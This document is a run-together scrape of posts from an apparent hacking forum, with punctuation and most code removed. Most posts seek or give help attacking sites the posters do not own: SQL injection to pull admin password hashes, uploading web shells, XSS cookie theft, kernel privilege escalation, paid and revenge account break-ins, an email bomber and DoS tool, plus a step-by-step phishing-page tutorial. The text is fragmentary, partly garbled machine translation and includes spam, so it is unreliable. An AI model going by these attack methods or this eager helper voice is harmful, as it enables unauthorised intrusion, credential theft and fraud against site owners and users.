anyone.
when sql inj is available and union works what options do i have i mean only select after union because i tried update delete and nothing worked.
thanks pexlii check and see it s private adsl from their company so very hard to enter or has proxy u have any trick to ask admin open or send a virus to open socks so i can connect.
this seem s to be freehosting write mail to support.
thank you gentlemen i really wanted to work out how to do it myself i m not as logical as i could be i figure that each domain has a dns entry somewhere pointing to an ip i just can t see how you can check all dns servers for an ip address and match the names up it must be obvious but i can t figure it i can t see ping being any help as it is only a icmp looking for a response.
just try some reverse ip sites tools here is a very good one.
locatefind and working with any shell.
use admin finder.
you ll really need some more skills over the avarage men i m affraid allthough u could always try and mention the site within a carefull post and who knows maybe you ll get lucky p.
microsoft jet database engine error e syntax error in string in query expression stfusername admin d home p adm sys inc dbsubs asp line this is the error i getany suggestions how i should continue tried union select password from stfkund but i cant find the correct table names how can i find out the table names microsoft jet database engine error e the microsoft jet database engine cannot find the input table or query kunder make sure it exists and that its name is spelled correctly d home p pcoffice adm sys inc dbsubs asp line.
i was debating on setting up a linux box to crack some hashes that contain symbols and mixed caps lowercase see my other thread and i was wondering if it is possible if it would be worth it to generate rainbow tables that contain exactly of at least one lowercaseat least one numberlength or this make any significant impact decrease on table generation and lookup time.
by default glype has hotlinking enabled which makes it impossible to link to proxified pages glype ddos v is a proof of concept that can bypass the hotlinking feature of glype the main idea for glype ddos was to make as many connections as possible using diferent glype instalations available in the internet this way it was possible to create multiple connections from diferent sources to a site the problem is that you need a super computer to handle all the pages which makes glype ddos v obsolete you can still run from your system and make http requests to a site but it won t make the server overload this public version comes with only glype instalations feel free to poke the code download the virustotal result come positive for one antivirus i never heard of bkav the virus name is w hfsiframe c and this isn t a w executable for windows bits but yes it uses iframes since when iframes are viruses.
php remote arbitrary location file upload exploit is required to leverage this issue.
simple question how can i upload a php file on a remote server that uses fckeditor as wysiwyg i based my research on the that can be found here simply is the uploader using the php connector since in the connector php file upload is forbidden i m looking for a way to get ftp access so i can retrieve some files anyone can help on that one.
hii uploaded c its like this link do not know why there is no between the numbers and c but anyway when i click the above link notting workswhat is my mistake.
yea but that appears not to be working either atleast for m.
i have a big troubles if i type url.
how i get the salt by this exploit.
font system color green size an email bomber basically sends from one email a mass amount of emails to another fast i thought this may help some people so i ve got a video for you and download links for this program virus freevideo scans url aa da f e c ee a c virus total url url versions of the files i uploaded just one is zipped and was is a rar archive no difference other then that thoughenjoy size color font url here for download size color url url here for download size color url.
ok there is a site i am trying to hack wich got good security so the only thing i was able to pass as xss is on the avatar image.
hey alli m currently trying to exploit a vbulletin forum that runs ibproarcade i know my exploit works fine but i want to be able to speed it up currently i am retrieving one char of the md d password at a time and that in itself takes about queries per char and then i also must grab the salt so anyway i am looking for someone to help me open up this exploit.
whats the best way to go about this.
hmm this forum doesnt seem to be too busy anyway i figured it out i just had to modify this perl exploit a bit just changed the offset from to.
time use google.
how can i use it on my real target when i use it nothings happen no error no popup nothing.
yeah paranoic admin ok try first phpinfo look full path to the your site then use readfile home blabla file php to read files try do upload perl shell into cgi bin directory.
i guess what you have seen is the phpbb hack but this issue is fixed a long time ago so the hack won t succeed it is not your fault the forum seems to be secure.
going to make this long story short i run a botting service for a game i bought map packs of of someone and because i made a complaint he jacks my money and revokes my privileges to get any access of the map packs i bought so im not looking into screw his forum up which he does deserve but just wanted to get access if anything im a cisco network eng i could just flood all his ports he has open and make that go on for a week long but ehh still doesnt help me out.
hehe funny just change name of that script with another you said you are tried with htaccess file i dont think so or you are wrong something just restrict the dir of the file elune.
how do yu do it i am talking about invisionfree not the ipb thnx.
probably you don t have access to those directories you want to put tha file in i don t think you will find a writeable directory in safe mode though there s a recent mysql bug that allows you to bypass safe mode and read anything from the server if the sql server and the file server is the same.
hey brotha you must use classical techniques of sql injection use the search box p d is it prohibited real urls.
thanks for the swift reply i m a computer science student but you ve completely lost me lol i have a forum at myurl com and the flaw is in the global php so i m trying to work out the sql query needed to return the password for a user to me what sql query woud i need to use to get the password for a user via their user number please and could it all be done through my browser thank.
its a cookie stealer for session hijacking followed by the document cookie.
ok so now look for exploits let me google that for youfind a few that look like viable attack vectors and try a few out.
first you have to complete the first request sql and then tries to complete the second request i don t know the table users i saw your first request on the table article then it is a u to found on the second table displayed for the users and passwordsso i tried to see the db name given by the database then normally you find the name of db on the url like ur examples.
question i can upload php shell via coppermine photo gallery but why i cant upload anything via my shell r c nstview all question server is safe modei cant read fileread my dir via any funtions i dont have accountini restore server is disable some functio.
also this is a great read for anyone wanting to lock down thier newly installed mssql server.
hikoko i sai.
random question but has anyone found any luck with keyloggers did you ever get some info returned i use winspy pro myself its not free but you can find it rapidshare but has anyone been successful or should i invest in email cracking software.
what type of forum they have if ipb i could tr.
help where i can found about step by step tutorial to be use sql injectionwhat mus to do first please some one helpto give me link i need learnthank.
i have a problem and i just need help plz look i just tried to inject those injections some requests dont works need solution plzwhen i try this injection it work perfectly true and false or or.
hey guys here is an amazing site i ever saw downloads com with loads and loads of online money making secrets by gurus it covers seo affiliate marketing gambling secrets adsense adwords e whoring making money with cpa etc and everything for free i was regretting because i never found this site before and i wasted so much money online i have subscribed for their vip site as well and looks decent for me i started making day now using one of their ideas in vip section let me know your opinion as well.
i belive that it should be.
why everybody want to enter to some site in main door why you don t try to get inside from back door look ip of your site look is alone of this ip or there was sites.
phpbb forums hacking example forum on which you can test it legally foreword in these tutorial go we learn how we phpbb are possible forums hacken using exploits which we download i do not go further on the term exploiten in or the errors i will your only learn how we phpbb are possible forums hacking and i emphasise still even that this illigaal are if this is done without authorisation and i am nowhere responsible for once you have this under the knee hope i of that you admins will to help destroying forums the exploit exploit are a script which uses of errors in a forum this way determined rights be able get if guard word hashish to be able get hold of etc exploits are generally written in c perl and in php and we will use exploit which has been written in perl we must therefore firstly get hold of the exploit to do that we use google and type exploit phpbb but i go rather to milw rm com of the largest exploit site which i know i go there to search and bowl already fast at these are therefore the exploit script we see to usr bin perl from that layout i that we to do have with exploit which have been written in perl therefore lettuce these script as exploit pl on c disk draft cube store as exploit pl download perl our exploit need carry out script we use therefore perl now we go to google nl and we type in download perl and already rapidly come we on a page and there download we perl for lazy people onderons here a link now we perl have downloaded and we have installed further to the real hacken of a forum hacken of the phpbb forum here our example forum is on which you can test it in my example i use this forum also oke we go ourselves firstly register pay attention there to that your name but from part exist therefore not jan piet can but janpiet i take nice orginenal in my example the name ur now we have acount we let us proceed to the hacken open amount starts uivoeren manage type and then grapple command we save our exploit with the name exploit pl on c disk have stored therefore we type now the following in amount cd without natural and very grapple c and then we type exploit pl and reiteration grapple and get we this do not get you this have you perl not well geinstalt or something else code usage perl nenu pl site phpbb folder username proxy optional i e perl nenu pl site com forum bigadmin oke here are explained how we using therefore we must firstly the site then the folder where the forum is himself and then our acount name in this case ur oke now will you that do with you forum in my example is that my example type i in amount of exploit pl illegaaltje nl phpbb ur and i very grapple such as you sees i replace for differently give that error and i omit index php now krijg something like that as below code trying to connect to illegaaltje nl phpbb forum is vulnerable trying to get the user ur id done id trying to give user ur admin status well done ur should now property an admin status now you go to the forum and unwieldly you go up your acount and to realise you that something below the forum in the direction of adminstratie permits panel there and that is the proof that you are admin what you do not will do for rest are entirely you choice go along i you to help i would tell the admin that its forum safe is not and together for a solution to search epilogue i hope that you have learned of this something and now forum will search admins help with these wrongly and improve be nowhere responsible for therefore everything are whole on own risksrry for my bad englis.
how i can read etc passwd in phpmyadmin.
so i ve been thinking of a way to hack upload scripts was wondering if anyone knows if changing the content type of a file would make it possible to get around a simple content type check for example if the server checks for types like application octet stream to filter out people uploading php files one could just change the type to something they do accept would this let you upload your code and run it lastly how does one change the content type in php i ve briefly looked at it but not sure how i would apply it to be able to upload files perhaps if i use libcurl.
yer dat happens to me anybody know of a solution.
looks like all the other sites dont have read permission for me i actually do have read permission for and quite a few of it s subdirs i found a file telling me the names of sites and their username no pw i tried changing dir to home user but no go i tried home user and home user public html no go any ideas anyone know where the mysql databases are stored or something interesting.
ok i m trying to run a perl script but everytime i do i get this can t locate tk pm in inc inc contains c perl site lib c perl lib at exploit pl line begin failed compilation aborted at exploit pl line help.
i ve got an exploit and i end up with something like shell in dos although i m not really sure where to go from there i can give more information on it if needed.
it s for fantastic news perl fnews pl cmdbrings up shell.
how can i know the software which they are using i only know the sites i dont know the software th.
i find this error and i dont know how i can exploit him someone can help me.
hi one question when i have sql query insert for example insert into kupa w dupe values sqx wher in sqx can you insert sql code and for example sqx select x from y where z z so insert into kupa w dupe values select x from y where z z but the select can not insert varible from table y what is wrong or how to use sql injection insert mysql i use mysql and big th.
hihow to make union work if one column from source table has got text type for ex.
hi guysi own a vbulletin forum which is installed and currently at version but there s an sql exploit that has been documented on the web and i can t afford to upgrade the forum by shelling out more money for a renewed license so i was hoping to learn how to inject sql myself and see quite how easy it is to hack the forum this is an example but i can t get it to work can someone explain it a bit better to me thanks description vbulletin contains a flaw that will allow an attacker to inject arbitrary sql code the problem is that the variable in the init php file is not verified properly and will allow an attacker to inject or manipulate sql queries manual testing notes an exploit example select concat options as titleconcat a s s s allowphpinfo s s languageid s s styleid s as data thanks.
yeah i think they re patched thanks for the nice tutoria.
nope i dont know perl but i can still tell that you need arguments although i dont use the th as you might have noticed coz it gives me errors i d like some to lighten my mind on this one i use d as the last argument just like it says in the exploit s code and it gives me the system cannot find the file specified but thanks for the reply anyway.
yeah cookie editor plugin for firefox.
all depend from server and his webamsters i think you are in jail search some backup files or some other intresting files maybe you find other ftp access or something more intresting btw in keep s only full path to every site on server no pw s inthere p s post pls id on your shell on server.
when look ip up and ip down.
see below log in here may be you can find a way to upload shell and deface.
i have an gmail account i ensure i signout of gmail i didn t use this email for any other gmail service yet many times when i check the ip log i get that this account may be open in some other location clcik on signout all sessions can anyone explain this please and is it possible to check gmail without your ip being logged.
its a good fast program but at the same time it is incredibly picky about the format of the hashes that are entered i found it to be too much and so i don t use it but there are people like you who have those problems google it i guess would be my best advice.
wikiscanner is one of the best tools around can type in any word to find any network for anything connected to itfor example you type university and you get universitiesif you only want us universities you can find them alsoand so the possibilities are unlimiteda list with examples wikiscannerekz skynetblogs b.
if i am not wrong u can use it this wayperl name of script pl site com fnews site com shell txt ls linux comman.
you will need to view vbulletin s code to find vulns in the way they write their sql queries other wise just find more websites explaining it or use a new vbulletin exploit thats backwards compatible with i uploaded these for you that help.
at least u give the exploit name as an info or let us know what kind of thing are u exploited.
ll need python to run this google it.
is there any good tutorial based on php and mysql or maybe you can help me out in getting to a command running level after finding an sql injection exploit and how injections can be combined with rfi attacks tn.
yes i m positive it translates to test but i m not sure how why if you are honestly trying to help me out i would just concentrate on da ed f being the encryption because i think the rest is just fill in i ve tested with every method i can think of but nothing seems to work.
hes more than likely gained admin access and set himself permissions to do so or you may have added him to a usergroup thats allowed to post in that forum thats all i can really think of.
h.
plz i need help any can one can help me to know what mean this message whene i trying to inject i receive this message server error in reseller application runtime error description an application error occurred on the server the current custom error settings for this application prevent the details of the application error from being viewed remotely for security reasons it could however be viewed by browsers running on the local server machine details to enable the details of this specific error message to be viewable on remote machines please create a tag within a web config configuration file located in the root directory of the current web application this tag should then have its mode attribute set to off web config configuration file notes the current error page you are seeing can be replaced by a custom error page by modifying the attribute of the application s configuration tag to point to a custom error page url web config configuration file th.
it seems you are trying sql injection so you have to use a valid username usually admin is good then a mysql statement which is alwasy true like x x so the password could berandomtext or x xwhatch out to use the quotes corectl.
alright so i found an injection and it is in a different database than the users which i m looking for i think and the injection im using to find the tables i.
phpbb is quite secure i can not imagine a security hole in there at the moment maybe somebody else can help.
helloi m a newcomer here though i ve read this portal before seems quite useful time to time lately i acquired myself acunetix web vulnerability scanner enterprise i ve been using it quite a lot since v but none of us is ideal and or perfect to know all of the functions basically what i need to execute is through http i want to add a link under request tab and number generator to end of its link similar.
i try to browse this url i get.
i upload shell the machine as kernel i cant edit any files on the server someone know a way to got the ftp on this machine to be able to edit or write files please give me some idea to be able to edit files with no privilege.
hii ve got the complete backup of a wordpress blog including the config file and database backup case is phpmyadmin is only reachable by cpanel and that isn t the same password i know for sure the username is correct there is no sub domain phpmyadmin site com or folder site com phpmyadmin where i can reach it also i can t go to the hosting s website to login or try to reach phpmyadmin since they don t offer that just the default cpanel on your own domain so what did i try and painfully failed with is reach phpmyadmin by domain reach phpmyadmin by hosting webpage reach phpmyadmin by login in cpanel with the password scan sites on the same server for security flawsanyone got suggestions what else to try or a suggestion how i can decrypt the admin s password it s a phpass password im currently busy trying the rest of the websites on the server for security flaws since i really need this one down.
thank you pink not just an error with path disclosewhat does this string mean anyway i mean what info i was supposed to get thanks againp s you also missed a closing parenthese i thin.
how can i call record from database eg com admin aspwhat do i write on username and password section.
blind sql injection is more complicated then your case like a when there are no error messages and all you get is a boolean from web page by looking if it executed normally or it redirected you or gave some other sort of hidden error message note not a sql error message a message like sorry server encountered an error or similar then getting any info from it gets much more trickier your injection is interesting too but without a possibility to test i m not able to give good help what you need to do is be very open minded about all a method called i think fishing what it basically means is that you make a subquery and use like regular expression operators if possible in where clause to see if match is found in password column and make the subquery return a signal about it edit you might want to look through waraxe s advisories he had a perl script with this conscept somewhere around here hope it helps somewha.
its a blind i have try to use the attack injection but it doesn t realy working for me i need you waraxe or someone other can help me about this it make me crazy its right but i have a problem user and ascii substring select concat version limit pass n.
hiwhen i put this look what i gotuser order by pass n.
you need to found out from which ip you can login and seek proxy in this range if you can t find proxy in this range you need to hack some server iz this range something like that.
i hacked web serverand i found remote login of other serveri login it s ok but windows show this account must login from other computer i m sure they banned ip any body can help me i want admin turn of filter in remote any social enginerin.
i need to get into the admin cp i already have the web address for it i am just missing the username pass i have an idea of what the username would be but i do not know the pass i am willing to pay to whoever gets into the control panel pm me for details pleas.
i have a problem in this request sql look on the url linkwhen i put like that index php id i got this error sql on the url.
really really increadible thank yo.
i have installed wamp server but i keep getting erros s when i finished the installation is a picture when i am trying to run a php script but when i look at the folder which it says it is missing dll s then i can see that the dll s are there and in php ini is nothing wrong so i though that i could be the installer so can anybody give me a good installer or is it my fault thanks for your tim.
i got live what is plus lo.
hi there any one has a working cookie editor im using firefox thanks in advanc.
first off i am a beginner when it comes to any of this i have a website which i have attempted multiple times at trying to get any information from it it is ran by php nuke assuming with nuke sentinel and hammer protection sql injections aren t working for me their forum is phpbb but it is inside of a module so i cannot access it directly it is running apache on a unix box brute forcing passwords doesn t get me anywhere with the hammer protection pm me and i will release the website address if someone could help me out and point me in the right direction it would be much appreciated or maybe another idea for me to check out marl.
post the site and i will help you.
acunetix scanner or other web vulnerability scanners can show the structure of a site and the files which are saved in each folder is there a more silent way to get the files inside a folder of a website eg get the directory ww example com images or at least list them is there any server side restrictions for not letting people getting directory s full content or listing it i guess noone would be happy if someone downloaded his php scripts tnx in advanc.
updatei found the file that precess the form.
i have velnaruble site with blind sql php id when iam using to test the site the page changed and the scanner show to me there are blind sqlwhen iam using order by the same changed and no thing happend order by or or the same thing so how ican know the number of columns and when i added and length version iam geting access forbidde.
da ed f does anyone know what type of encryption this is.
steganos internet anonym pro.
exploits show either a can t connect or can t use an undefined value at line do you want the link so you can try beleive me i can.
ok this is getting a little tedious i to be absolutley honest dont know i get the idea behind the exploit but it goes in no detail how to actually comprimise the system from what i can see all this does is add to the avatar url a simple poison null byte im pretty sure this can be exploited but due to the lack of information provided by the exploit author i cannot do any more easily edit ok so i am doing a little more research ill post if i find anything.
no your ip will always be logged if i were you i would change your password and if your password is the same for any other accounts you have change them too.
if add new cookie in option new expiration date set date to month forward.
hi again forum i learned to program my own cookies so i make work some proff of concept from this page now i am with phpnuke and the sql injections on it in several sites i get the following database error warning mysql num rows supplied argument is not a valid mysql result resource in home chiche something com includes sql layer php on line sometimes it gives me another random error line this happend to me when i proved the concepts in the multimple phpnuke from the page especifically the sql injection parts maybe versions are not the same as the exploit i want to know why that error happend and if there is some way to bypass it thanx uchich.
pm me the links to their forums i might be able to help.
helloi tested coppermine photo gallery on my localhost and with reflected xss i stole admin cookie i tried to use this cookie to log as an admin but i dicovered that cookie from user and from admin are the same what type of login mechanism is in this gallery what can i do with steal cookie i m sorry for my english i still learn this language.
target site server has old x mysql server without union enabled so you can t use sql injection in this case.
i cant get john to crack md s or lm password hashes please any advice helps.
i wrote a tutorial about rooting actually.
alright i got a script im testing on my local host right now if you do site com home php start.
hii know that you help everyone how try to work and i know that you do not like lazy member i tried to do my best to get some info from my target ipb forum could you please tell me is this good info i need to deface it or admin password what i need to do now.
well if you really want help you should give us more details also some servers will disable the type of functionality you are trying to us.
you can certainly get a good foothold on a server if you find a successful rfi vulnerability assuming you are looking for rfi exploits on a php driven website ou can use rfi to include a shell script such as the c shell or any other php script to gain command line level access to the server with the same privileges as the web server user i would suggest the first step is to look for local file inclusion before you start to look for remote exploits thats just my two cent.
hey i am new in forum i want to know all type of hacking website i know just sql file file tell me all types of hacking i need itand information about i.
hello im new user for here i have one problem plz help me in username and see this error warning mysql num rows supplied argument is not a valid mysql result resource in home site public html admin login php on line warning mysql fetch assoc supplied argument is not a valid mysql result resource in home site public html admin login php on line how can inject or hack this site how can getting table name and column namet.
my tippdon t hex the tablemaybe it work.
hi last few days trying to hack a site but i can not i used exploits but no perl do on this site even the exploits of superior version if you have an exploit that works with this forum thank you to tell me thank you very much the site.
thanks darling i appreciate it tons.
hii m found sql injection in site and i tried this.
usernamane xpassword x or like this.
hello againi started an injection on a site first thing is the basic test didn t expose number of colums only displayed error messages and missed imag.
solved it only took me a week but here is the next problem in the same site after i ve checked the table i wanted it turned out not to be the members table and in fact i didn t find any table with members passes or any other infosthe information i got since my first try on this site isuser i can t wrap my mind around this concept shouldn t i be able to see the tables in this database like so show php type model id union all select table name from and another question please could i and how see a list of available databases for this site please thank yo.
thanks alot but i still cant quite grasp how to choose where to upload the file.
im trying the exploit on my own forum before the actual attac.
anytim.
try this.
hey i saw the exploit for posted on here but it dosnt work im looking for a working remote sql exploit.
first of all ill give you some hints things you must know before trying to find the passwordslearn a little php enough to make you understand how the strings and funtions workthen read about sql injections after you understand how php works so you can get to know how to inject sql commands into php scriptsafter that check out exploits for the vb software to see where and how to inject the sql command thats a brief to lead you to your start and wish you all the bestand dont forget php sql exploit.
damn it you posted it again please stop spamming this forum thank you we will read your threads even if you started just one.
there is three databases including mysql and information schema.
if you have access to the admin account why not just change the path manually and also what is the aim of this attack if you alrady have control.
hello sorry for my bad english but i am from germany i have lost the root password to my virtual rootserver the server is using and i have access to the web account with sshits a debian server with kerneli tried the following eploitsraptor chown it works but it only changes the group to my gorup for the file it doesnt change the owner to me rw r root ftponly jul etc shadowthe exploit gave me group access to the shadow but only r so i got root zfigglp a sxqnfpf but i don t know how to decrypt the password i uses john but its to slow than this mremap pte kernel stab enterprise vulnerable yes exploitable yes mmap x x failedit says yes exploitable but then failed i dont know what i can do now does someone of you know a good exploit.
ok firstly i ll say that however tempting it is it probably won t work unfortunately the first job is to identify possible weak points for attack eg software you have already identified that the server runs apache the next step would be to get the names and version numbers of as many pieces of software running on the server as possible some ideas the ftp server and version the version of any forum or cms software the website is hosting the apache version is there a remote accessible mysql server running is there a ssh daemon running if any of these still confuse you pm me with the details and i ll do some digging for yo.
send the site by p.
tutorial how to make phishers author trick aka saywhat contact badnews saywhat hotmail com p ison org what are phishers phishing is the act of tricking someone into giving them confidential information or tricking them into doing something that they normally wouldn t do the attempt to fraudulently acquire sensitive information eg passwords account numbers or financial information by masquerading as a trustworthy person or business in a seemingly official communication source google p the type of phisher we are making today is a website phisher a website phisher is a web page that looks exactly like the web page of your target so it tricks them into logging in or submitting information which then gets sent to a log file or your email i have chosen to make a phisher for myspace com go to your target url i have chosen myspace com view the source firefox users press ctrl u internet explorer users right click view source a notepad file should appear copy all the text right click select all then paste it on a new notepad file call this file index html we now need to make the page send all the usernames and password submitted to send to a text file to do this on your notepad file press ctrl f and a search box should appear search for actionkeep looking until you bump into something like this.
your explanation is terrible how did you put the shell on the server there is no need for a to be between the numbers and the c as long as the php is there then you should be fine.
coppermine can upload so that this directory is writeable yesi know but i dont have any mysql account in server because i cant view file only etc passwd via posix getpwuidi think when i get passwdi only have a solution to brute force password any ide.
i try these links on various forms running x and it doesnt wor.
hellohow can i use reflected xss in docs showdoc php from multiple in coppermine if anyone can answer my noob question thank.
hi i was damage in this site from one guy that in game called me and said me that he has hacked my game account i know that there is a bug in the source code of this site to take user and pass information from db sombody can hel me to find this sql inj to take my revenge tnx a lotsorry for my little englis.
waraxe could do answer it better than me but i would saythat it would still be possible to use something lik.
right now if i did site com graphics glitter index php pg it shows me what files are where is anything else possible.
here is a simple start for you should find these useful any questions just pm me.
depend s of server where you want to hide shell and mostly admin hoo working on server if is stupid you can use code you posted but if is smart they well be grep on all system function passthru getenv exec system etc list is too long.
original link her.
what is it you just post a link and not explain lo.
hi i m trying to inject into this quer.
i inject one of the site and had username and passbut i cannot find any admin login to upload shel.
i got this urldelete message type sender deleted message id page messaging section sent start limit order field m reg date order type descif i modify the field order field m reg date to order field here is the injection i get error mysql you have an error in your sql syntax check the manual that corresponds to your mysql server version for the right syntax to use near here is the injection desc limit at line query sql select a name u username as receiver username w name as wanted name m from prid meging m left join prid auons a on a auction id m auons id left join prd waed as w on w wed ad id m wed ad id left join prd users u on u user id m receiver id where m sender id and m sender deleted order by here is the injection desc limit what can i do with this thanks in advanc.
lots of vunerable sites i can never do the final step of retrieving the data from a table i can get the table name and the column names but never the data what is wrong with my querys ok lets say my website is has columns column which is visible on page is i get the tables of lets say photos users and notices so then i get the columns of users which are id user and password i d.
try alert hello plus i dont know why you would even want to anyway but yeahand no you cant execute php code through xss your thinking of remote file inclusion or you can replace.
html teacher is the right tool to learn the basics of html in a simple style and easy to use a user can pick and create live examples of html learn how to make a link insert a image video or mp aside from learning how to embed mp videos swf flash and youtube videos download.
one resource useful en these case.
hey all i am experimenting with some programs on my lan for and how to use themcurrently trying to exploit vbulletin don t know how to inject that and read a couple of tutorials to no avail simply can t understand it any help would be great cheer.
nice language dude you don t need any sql injection programsyou need only your browser.
code com forums index php act idx.
my ipb was hacked and now i cant even get into my acp i need to get into my admin account i alrady have forum acces but no admins can do anything the acp login box looks wierd toohere is the site any help ideas.
i don t think it will be possible you see the only input in that code is startthe command.
this is not a critical vuln because you need of a super account original link her.
looking for the admin password or at least the md hash for this forum version it s running xss remote cookie disclosure exploit will not work as html is off and i can t get the hang of the csrf method any help would be much welcomed.
there are some things wrong with your sql statement i suggest reading something about basic sql and sql injection you use the concat function and then start with normally you should replace a visible number on the site with the column name or concat you need so for example you d get concat if the number appeared on the site somewhere i d also drop the where clause it ain t necessary as far as i know if the comment doesn t work try instead.
hello i m currenly documenting this vuln and make probes in mercuryboard x and x any of this xploits working but is shure what can inject sql commands have any more proof of concept thn.
vo disponibilizar pra galera phishing do banco do brasil extrair e jogar no host use apenas para estudos.
i have just discovered your website and get pleasure from each and every article i admire your talent moncler jackets saletory burch bootstory burch flatsgiuseppe zanotti shoesbeats by dre headphone.
hii m a new member in this forumi have a question is there any tools to detect second order sqlias thank.
yes men very good work zeeloc.
wow this is what i am looking for update wow that totally works that is the neatest shit i have ever seen in my life the person who made that is a freaking god i m freaking out it s so awesome ok like i said i will uploaded this and if the link dies just pm me on this board and i will reupload update if anyone has anything like this for any another forum board script please post it cause that would really be awesome i will upload this vb script precracked and ready to go when i got it working just as a thanks for everyone helping me out on this again i want to say thank you to everyone who has posted on my thread you guys are really pretty awesome here so thanks a lot.
so i downloaded the file at school then i exstracted it to the desktop then click the program netsendspoof but it doesnt work the publisher box comes up and askes me if i want to run it then i hit run and nothing happens but il try it at home later and let you know.
so i have ftp access to a website that is hosted by a host for hundreds of sites and can upload r or c etc i can t access any higher than the home user directory home has permissions drwxr x xi can get the etc passwd but not etc shadow i want to be able to access other sites files.
remove from url.
thanks man the second code is workin.
could just d.
i dont have any ideas im not into perl or windows exploits but if you get it to work give me yell ive been looking for one for ages.
hey when iam trying this command modules php name news file friend op storysent title cscript alert document cookie c script then i see my cookies but what command i need to make if i want that the cookis will send to my homepage because in this command i only see my cookies and it dosent helpso does anyone can give me please the full command with this xss bugmodules php name news file friend op storysent title cscript alert document cookie c script that will send the cookies to my homepage.
in the owned by uid you should find the root user or scaling the privilegie.
hello eyekneade sea and welcome to waraxe hope you enjoy your time here.
anyone.
hi i need a small script shell backdoor with search option to search files and folders in server can any one help me the c script was not working for me s and the version of php is x x thanks for any help and sorry for my bad english.
hey guyz i m new ur site k dear friend as u know stored procedures of mssql returns value just in int type which usually shows proper execution of s p xp cmdshell is extended sp and accepts just one input parameter and no output parameter and returns bit shows if error occured or not when u run exec xp cmdshell cmd at query analyzer u can c result of command execution by system access all system resources printed at console of query analyzer but by ado ado net and other db commponents that s not possible c result text printed at console so at that sql injection u cannot c result of xp cmdshell dir so using commands just gathering information is useless but still command is executed and it can affect server like exec xp cmdshell format c if i made mistake tell me and help me find a way show printed result by ado in asp pages this is a simple scenario help get answer of that question.
this is exploit for ipb finalin this version no salt need only md exploit not work for new version s.
try to upload shell via sql to if you have file perms.
oh sorry sure the code would be.
hi everything good i think you should first try to attack the schemata the information schema and then proceed with the attack until the en.
hii am testing the exploit below on my test lab network.
edited by request.
good afternoon gentlemeni m still having trouble finding a reliable way to enumerate a host ip address so that i can resolve all of the domain names websites running on it i ve used a couple of websites but they have mixed results is there a tool application that can do this or perhaps a script that someone knows of i am happy to do it manually if i could work out how any suggestions would be welcome tinma.
man someone must have made you angry yep learn some skills let us know how you got on co.
frist let visit login with user dora and pass after that try to browse this link will get your user id and pass hash that s so great who can help me to get pass hash of admin of this forum show me some ways thank a lo.
ok upon closer inspection you were right both admin username and password need to be supplied the avatar location isn t supposed to change i believe i think that it allows the upload of any file type to any directory through the profile page the exploit simply adds the poison null byte to the end of the avatar path possibly breaking any validation attempts by phpbb allowing you to upload malicious files admittedly the exploit is not very well documented and no white paper is provided.
im pretty sure you need to be admin.
could be but as i said i am entering admin user and pass and it still doesnt wor.
modx parse error modx encountered the following error while attempting to parse the requested resource execution of a query to the database failed you have an error in your sql syntax check the manual that corresponds to your mysql server version for the right syntax to use near nameintroduced and modx modx web user attributes internalkey modx modx web at line sql select modx modx web users modx modx web user attributes from modx modx web users modx modx web user attributes where modx modx web users username regexp binary nameintroduced and modx modx web user attributes internalkey modx modx web users id copy sql to clipboard parser timing mysql s s requests php s s total s si then insert the correct syntax for injection login union all select username modx web user attributes from modx web users password anydo everything right here but i can not see the password its blocked best regard.
i think it s dbname skatespo skatespo patrickpass patrickdoes that look right i don t know if it s the myslq user pass cause it says config masterserver username skatespo patrick.
basically i need help cracking this password or is there anyway that i could open it because its asking for a password when i open the word document.
i have a problem into find admin login page for this site found hack admin user pass but can not find admin login page from this sitealso with havij and acconitix i ve tried i could not resultcan be injectable for sql injection large book publisher in the middle eastif the find admin login page wright the bottome or insert a massag.
thanks i appreciate it alo.
it would really be appreciated if some one colould do what i neede insteamd of telling me as i am not so clever and wouldnt b able to do it lolcould someone please crack s invisionfree com zimsmods this site and crack the account zimdale which is admin an send me the password by pm please much appreciatio.
asking for a detailed explanation on how to use this thing im trying to run it with these arguments selecting my own phpbb forum as the victim perl phpbb pl localhost forum actual admin name actual admin password images avatars shell php it thinks for a sec and then just ends without any output and the avatar location doesnt change what the hell am i doing wrong how do i do it right and do i really have to put in the forum s admin s name and his password in order to make it work coz i dont think if ill find the exploit very practical then.
okeverything is doneupload cgi successful thx everyon.
pretty simple question i want to know if any of you know of any scripts forums and guestbooks are a plus that do not hash the passwordsmy friend told me there is some mod for phpbb that changes it to it doesn t do md anymore and the passwords are raw that means you can look them up in the database without having to waste your time with md cracking sites anyone know of anything i have been looking around and no luck hope someone can help me ou.
other good page xss.
hi can some share a exploit for wordpress thanks in advanc.
fd.
this is a vulnerablity in webhints scripts and user can execute command by example com hints pl c mmand example example com hints pl uname.
try to use rainbow table googe.
original link her.
i ve got a exploit but i don t know how to use it the url is and greetzdarkf rc.
you need to link to the file you want to include so upload the file somewhere or you can get wamp and just link to your own pc but of course this isn t very safe because admin will have your ip.
hello i v tried to get the admin password of a php site with a big vulnerability i get many table.
hello there i am new to this forum and found it by searching tto see if there was a way to find a pssword for vbulletin and i see there is atleast it look slike it to me the problem is im am a complete newb when it comes to this i am not looking to a tutor or handouts i would just simply like to know where i can read or learn how to find the passwords of vbulletin forums i here hash and salt discussed but not sure what it all means so i would like to read up on it and try to learn what its all about if anyone has any idea of where i can start i would greatly appreciate it thanks.
i have access to every directory on a unix server etc phpmyadmin has htaccess htpasswd config inc and blowfish secret the auth type is set to cookie so how do i find the password to phpmyadmin.
im trying to run this exploit i get syntax error line when trying to execute can someone help me pelase.
i ve same question how can i use to exploit.
first of all no posting vulnerable urls nd there are many exploits for old versions of phpbb search on you need to steal the cookie hash for that particular forum no use using a different forum.
if you have msn plus convos may be saved otherwise i dont think there is any way.
my shell needs to use the database on localhost and thanks pexl.
any boudy can help me i have q this code is md if md plz help me tanks for anytin.
hi onepls tell me how to hack ftp by right way i hav been used hydra command line but it wasn t ok thank.
ima bout to just program in backtrack because everything is already there is this a good idea for a beginner.
ok i figured it out looked up schemata in google alas no good news for me no users with plaintext passes tabl.
i d also like some help using perl if i use an exploit and lots of start to appear what does this mean i would appreciate it a lot.
heyso i have that box i need to get access to got his ip which took me a while to get him into a trap.
apache is a type of web server software that is behind many websites on the internet it is very large in terms of software making it prone to if your target is running a vulnerable version of apache you could gain entry relatively quickly to the target server in one form or another.
ok when you connect via ftp with fake username and password usually in the header is the server software and sometimes version try connection to the ftp server using fake usernames and passwords and post the entire header of the ftp connection if we have this we may be able to help yo.
my problem is error geting not found at usr local share perl checksite spider pm line in te file sipider pm line mech get uri note i used sqlix in the distro owasp thak you for you help saludos amigo.
